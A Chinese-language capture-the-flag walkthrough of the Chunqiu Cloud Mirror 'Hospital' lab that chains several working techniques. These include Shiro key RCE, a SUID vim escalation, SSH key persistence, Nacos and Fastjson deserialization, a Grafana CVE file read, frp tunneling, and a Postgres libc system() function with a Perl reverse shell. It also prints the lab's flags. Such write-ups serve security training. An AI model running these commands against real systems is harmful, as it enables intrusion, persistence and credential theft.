以攻防的角度真实打靶-春秋云镜Hospital打靶记录

前言

觉得这个靶场还是可以的 提权基本上用不上

这里的思路写的简便但易懂

正题

扫端口扫到了8080

8080弱口令登录

8080端口存在弱口令登录

admin/admin123

登录后无用

heapdump泄露

heapdump泄露

解密heapdump

heapdump泄露shirokeyRCE

这里看了一下出网

ShiroRCE至vshell

就直接上vshell了

关于上vhell和内存马我的见解是这样

如果上vshell有被溯源VPS的可能

这里是靶场就直接上了

直接交互式终端

这里不是root

vimbaisc提权

suid提权 

find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

和vimbasic提权都试一下

linpeas脚本也可以一把梭

/usr/bin/vim.basic  -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
/usr/bin/vim.basic  -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
/usr/bin/vim.basic  -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

flag{02957580-3706-4b75-8572-402224ced79c}

写个公钥(这个需要提前本地生成一下)

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi0Me8fXPvb2XDGDL7FmeG54FGhiDp2HHZTYvVOfyD11E0o5UtDYvBsdpgyZOGoJegUyq7/y+YVN+xaGf5LZ3jijhcyH57ukkyQ8YOsFQVJ8688HJHxmk63tgFi+GxPR3mm/QiprYEhTSUFF4D6CObuSCX5x/otVLFjmaSt/vTp+ger6PEoLJ/qeMVCoa/Zstx/FC/c4jXSHy0W+jdVnhmGRST1vOwKjQ5R2E6JrDo1ybnJErdQcsAIdlXq3PlTL4eYISDQuyfWr2mB44NozAFh9AOhoMzaPwxelpjVbIZwxFaF5QX4eaEbzd4tmvfv55VlZTgRGAyETsFzYh9xQ32KSpeS1FRBYx3WpWIqn+lL5PYs5xMv/t22eA5pJuQXvIwwA/olb8z0IKwUX8l2DRSlUNmOOPDVtCRni0THe4lbxMuEwjQ0yEKq2puQXNxWn1FOyX1z7TJis8+jKNgaiLbIeT4e6a/kaUzfQI7pO4aCnrmLYoRaLkS9uJUInn4M0fW1r+nVQPsE4heTArPfAlgfORh4qmlBtTl6ApNuyDTiFDtfDmzn/1Hgv7l8/zc9jhouikmECouvcwVDI0xP81+FfeY99KDiymAxHFUUqBHnKxkXNkErsDEXLDZ1i0M/0r2zBOgAJzLkRl6u31Oo3HjNDtbbYHO0nkuxheUCzJzqw==" > /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi0Me8fXPvb2XDGDL7FmeG54FGhiDp2HHZTYvVOfyD11E0o5UtDYvBsdpgyZOGoJegUyq7/y+YVN+xaGf5LZ3jijhcyH57ukkyQ8YOsFQVJ8688HJHxmk63tgFi+GxPR3mm/QiprYEhTSUFF4D6CObuSCX5x/otVLFjmaSt/vTp+ger6PEoLJ/qeMVCoa/Zstx/FC/c4jXSHy0W+jdVnhmGRST1vOwKjQ5R2E6JrDo1ybnJErdQcsAIdlXq3PlTL4eYISDQuyfWr2mB44NozAFh9AOhoMzaPwxelpjVbIZwxFaF5QX4eaEbzd4tmvfv55VlZTgRGAyETsFzYh9xQ32KSpeS1FRBYx3WpWIqn+lL5PYs5xMv/t22eA5pJuQXvIwwA/olb8z0IKwUX8l2DRSlUNmOOPDVtCRni0THe4lbxMuEwjQ0yEKq2puQXNxWn1FOyX1z7TJis8+jKNgaiLbIeT4e6a/kaUzfQI7pO4aCnrmLYoRaLkS9uJUInn4M0fW1r+nVQPsE4heTArPfAlgfORh4qmlBtTl6ApNuyDTiFDtfDmzn/1Hgv7l8/zc9jhouikmECouvcwVDI0xP81+FfeY99KDiymAxHFUUqBHnKxkXNkErsDEXLDZ1i0M/0r2zBOgAJzLkRl6u31Oo3HjNDtbbYHO0nkuxheUCzJzqw==" > /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi0Me8fXPvb2XDGDL7FmeG54FGhiDp2HHZTYvVOfyD11E0o5UtDYvBsdpgyZOGoJegUyq7/y+YVN+xaGf5LZ3jijhcyH57ukkyQ8YOsFQVJ8688HJHxmk63tgFi+GxPR3mm/QiprYEhTSUFF4D6CObuSCX5x/otVLFjmaSt/vTp+ger6PEoLJ/qeMVCoa/Zstx/FC/c4jXSHy0W+jdVnhmGRST1vOwKjQ5R2E6JrDo1ybnJErdQcsAIdlXq3PlTL4eYISDQuyfWr2mB44NozAFh9AOhoMzaPwxelpjVbIZwxFaF5QX4eaEbzd4tmvfv55VlZTgRGAyETsFzYh9xQ32KSpeS1FRBYx3WpWIqn+lL5PYs5xMv/t22eA5pJuQXvIwwA/olb8z0IKwUX8l2DRSlUNmOOPDVtCRni0THe4lbxMuEwjQ0yEKq2puQXNxWn1FOyX1z7TJis8+jKNgaiLbIeT4e6a/kaUzfQI7pO4aCnrmLYoRaLkS9uJUInn4M0fW1r+nVQPsE4heTArPfAlgfORh4qmlBtTl6ApNuyDTiFDtfDmzn/1Hgv7l8/zc9jhouikmECouvcwVDI0xP81+FfeY99KDiymAxHFUUqBHnKxkXNkErsDEXLDZ1i0M/0r2zBOgAJzLkRl6u31Oo3HjNDtbbYHO0nkuxheUCzJzqw==" > /root/.ssh/authorized_keys

接着finalshell私钥连接

上传免杀的fscan到tmp目录

开扫

这里习惯了用VPS的vshell起隧道

有时候还是建议还是打入suo5好

nacos反序列化利用-添加3389账号

扫到了nacos

使用nacos利用工具查到了sql注入

这个SQL注入有的工具可以直接注入内存马（这个sql注入注入nacos内存马攻防比较常见）

这里用另一个yaml反序列化打

本地起一个jar包

上传到vshell服务器开启监听

触发漏洞,成功添加了3389远程桌面的账号

这里连接后拿到第二个flag

flag{2aa3113d-6650-4e61-a0ea-1a93420fc8ad}
flag{2aa3113d-6650-4e61-a0ea-1a93420fc8ad}
flag{2aa3113d-6650-4e61-a0ea-1a93420fc8ad}

接着继续看内网的资产

尝试登录

爆出来fastjson

fastjson注入哥斯拉内存马

打CC1或者CB那条链都可以

这里直接用插件了

fastjson打入哥斯拉内存马

哥斯拉连接上后

拿到第三个flag

flag{a37b2902-71e3-4e31-9426-7682e8e83ee8}
flag{a37b2902-71e3-4e31-9426-7682e8e83ee8}
flag{a37b2902-71e3-4e31-9426-7682e8e83ee8}

写入ssh公钥

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi0Me8fXPvb2XDGDL7FmeG54FGhiDp2HHZTYvVOfyD11E0o5UtDYvBsdpgyZOGoJegUyq7/y+YVN+xaGf5LZ3jijhcyH57ukkyQ8YOsFQVJ8688HJHxmk63tgFi+GxPR3mm/QiprYEhTSUFF4D6CObuSCX5x/otVLFjmaSt/vTp+ger6PEoLJ/qeMVCoa/Zstx/FC/c4jXSHy0W+jdVnhmGRST1vOwKjQ5R2E6JrDo1ybnJErdQcsAIdlXq3PlTL4eYISDQuyfWr2mB44NozAFh9AOhoMzaPwxelpjVbIZwxFaF5QX4eaEbzd4tmvfv55VlZTgRGAyETsFzYh9xQ32KSpeS1FRBYx3WpWIqn+lL5PYs5xMv/t22eA5pJuQXvIwwA/olb8z0IKwUX8l2DRSlUNmOOPDVtCRni0THe4lbxMuEwjQ0yEKq2puQXNxWn1FOyX1z7TJis8+jKNgaiLbIeT4e6a/kaUzfQI7pO4aCnrmLYoRaLkS9uJUInn4M0fW1r+nVQPsE4heTArPfAlgfORh4qmlBtTl6ApNuyDTiFDtfDmzn/1Hgv7l8/zc9jhouikmECouvcwVDI0xP81+FfeY99KDiymAxHFUUqBHnKxkXNkErsDEXLDZ1i0M/0r2zBOgAJzLkRl6u31Oo3HjNDtbbYHO0nkuxheUCzJzqw==" > /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi0Me8fXPvb2XDGDL7FmeG54FGhiDp2HHZTYvVOfyD11E0o5UtDYvBsdpgyZOGoJegUyq7/y+YVN+xaGf5LZ3jijhcyH57ukkyQ8YOsFQVJ8688HJHxmk63tgFi+GxPR3mm/QiprYEhTSUFF4D6CObuSCX5x/otVLFjmaSt/vTp+ger6PEoLJ/qeMVCoa/Zstx/FC/c4jXSHy0W+jdVnhmGRST1vOwKjQ5R2E6JrDo1ybnJErdQcsAIdlXq3PlTL4eYISDQuyfWr2mB44NozAFh9AOhoMzaPwxelpjVbIZwxFaF5QX4eaEbzd4tmvfv55VlZTgRGAyETsFzYh9xQ32KSpeS1FRBYx3WpWIqn+lL5PYs5xMv/t22eA5pJuQXvIwwA/olb8z0IKwUX8l2DRSlUNmOOPDVtCRni0THe4lbxMuEwjQ0yEKq2puQXNxWn1FOyX1z7TJis8+jKNgaiLbIeT4e6a/kaUzfQI7pO4aCnrmLYoRaLkS9uJUInn4M0fW1r+nVQPsE4heTArPfAlgfORh4qmlBtTl6ApNuyDTiFDtfDmzn/1Hgv7l8/zc9jhouikmECouvcwVDI0xP81+FfeY99KDiymAxHFUUqBHnKxkXNkErsDEXLDZ1i0M/0r2zBOgAJzLkRl6u31Oo3HjNDtbbYHO0nkuxheUCzJzqw==" > /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi0Me8fXPvb2XDGDL7FmeG54FGhiDp2HHZTYvVOfyD11E0o5UtDYvBsdpgyZOGoJegUyq7/y+YVN+xaGf5LZ3jijhcyH57ukkyQ8YOsFQVJ8688HJHxmk63tgFi+GxPR3mm/QiprYEhTSUFF4D6CObuSCX5x/otVLFjmaSt/vTp+ger6PEoLJ/qeMVCoa/Zstx/FC/c4jXSHy0W+jdVnhmGRST1vOwKjQ5R2E6JrDo1ybnJErdQcsAIdlXq3PlTL4eYISDQuyfWr2mB44NozAFh9AOhoMzaPwxelpjVbIZwxFaF5QX4eaEbzd4tmvfv55VlZTgRGAyETsFzYh9xQ32KSpeS1FRBYx3WpWIqn+lL5PYs5xMv/t22eA5pJuQXvIwwA/olb8z0IKwUX8l2DRSlUNmOOPDVtCRni0THe4lbxMuEwjQ0yEKq2puQXNxWn1FOyX1z7TJis8+jKNgaiLbIeT4e6a/kaUzfQI7pO4aCnrmLYoRaLkS9uJUInn4M0fW1r+nVQPsE4heTArPfAlgfORh4qmlBtTl6ApNuyDTiFDtfDmzn/1Hgv7l8/zc9jhouikmECouvcwVDI0xP81+FfeY99KDiymAxHFUUqBHnKxkXNkErsDEXLDZ1i0M/0r2zBOgAJzLkRl6u31Oo3HjNDtbbYHO0nkuxheUCzJzqw==" > /root/.ssh/authorized_keys

双网卡不同段

ping也ping不通

先上传fscan 扫172.30.54.0/24

grafana任意文件读取

发现了5432有postsql以及3000有grafana(这个内网也挺常见的)
先打5432的postsql

利用grafana的历史nday(grafana CVE-2021-43798)读取postsql的账号密码

github项目地址https://github.com/A-D-Team/grafanaExp/releases/tag/v1.4

运行

./linux_amd64_grafanaExp exp -u http://172.30.54.12:3000
./linux_amd64_grafanaExp exp -u http://172.30.54.12:3000
./linux_amd64_grafanaExp exp -u http://172.30.54.12:3000

读取到帐号密码 postgres/Postgres@123

搭建二层代理

查看web1架构

x86_64架构

下面开始搭建多层代理

上传amd64_frps到web1

frps配置如下

[common]
bind_port = 1000
[common]
bind_port = 1000
[common]
bind_port = 1000

在web2上上传frpc

frpc配置与frps相接

[common]
tls_enable = true
server_addr =172.30.12.5
server_port = 1000
 
[plugin_socks5]
type = tcp
remote_port = 2000
plugin = socks5
[common]
tls_enable = true
server_addr =172.30.12.5
server_port = 1000
 
[plugin_socks5]
type = tcp
remote_port = 2000
plugin = socks5
[common]
tls_enable = true
server_addr =172.30.12.5
server_port = 1000
 
[plugin_socks5]
type = tcp
remote_port = 2000
plugin = socks5

再次ping

两边成功互通说明两边服务器的多层代理大家完毕了

接下来就是配置Windows的二层代理了

proxy配置教程

多层代理下Proxifier如何设置？
再增加一个代理，这里是设置的第二层代理
点击Proxychains 右边create将代理链按顺序从proxy servers里按住依次拖下，我这里起的名字代理链，都要拖在你起的这个名字（我这里是代理链）里，注意在同一级，如图所示
多层代理下Proxifier如何设置？
再增加一个代理，这里是设置的第二层代理

点击Proxychains 右边create将代理链按顺序从proxy servers里按住依次拖下，我这里起的名字代理链，都要拖在你起的这个名字（我这里是代理链）里，注意在同一级，如图所示
多层代理下Proxifier如何设置？
再增加一个代理，这里是设置的第二层代理

点击Proxychains 右边create将代理链按顺序从proxy servers里按住依次拖下，我这里起的名字代理链，都要拖在你起的这个名字（我这里是代理链）里，注意在同一级，如图所示

这样就配置成功了

连接postgresql

psql提权

修改root密码用于后面提权用

ALTER USER root WITH PASSWORD '123456';
ALTER USER root WITH PASSWORD '123456';
ALTER USER root WITH PASSWORD '123456';

创建命令执行函数

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

 服务器起个监听

perl反弹shell

select system('perl -e \'use Socket;$i="172.30.54.179";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
select system('perl -e \'use Socket;$i="172.30.54.179";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
select system('perl -e \'use Socket;$i="172.30.54.179";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

起个交互式终端

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

目前还是普通用户

sudo-l查看

可以看到存在psql提权

https://gtfobins.github.io/gtfobins/psql/#shell

sudo /usr/local/postgresql/bin/psql
sudo /usr/local/postgresql/bin/psql
sudo /usr/local/postgresql/bin/psql

密码123456

接着根据sudo提权方式输入\?和!/bin/bash

最后一个flag04也拿到了

flag{37a88598-f10f-4f54-98f8-075930460d88}
flag{37a88598-f10f-4f54-98f8-075930460d88}
flag{37a88598-f10f-4f54-98f8-075930460d88}

------本文已结束，感谢您的阅读------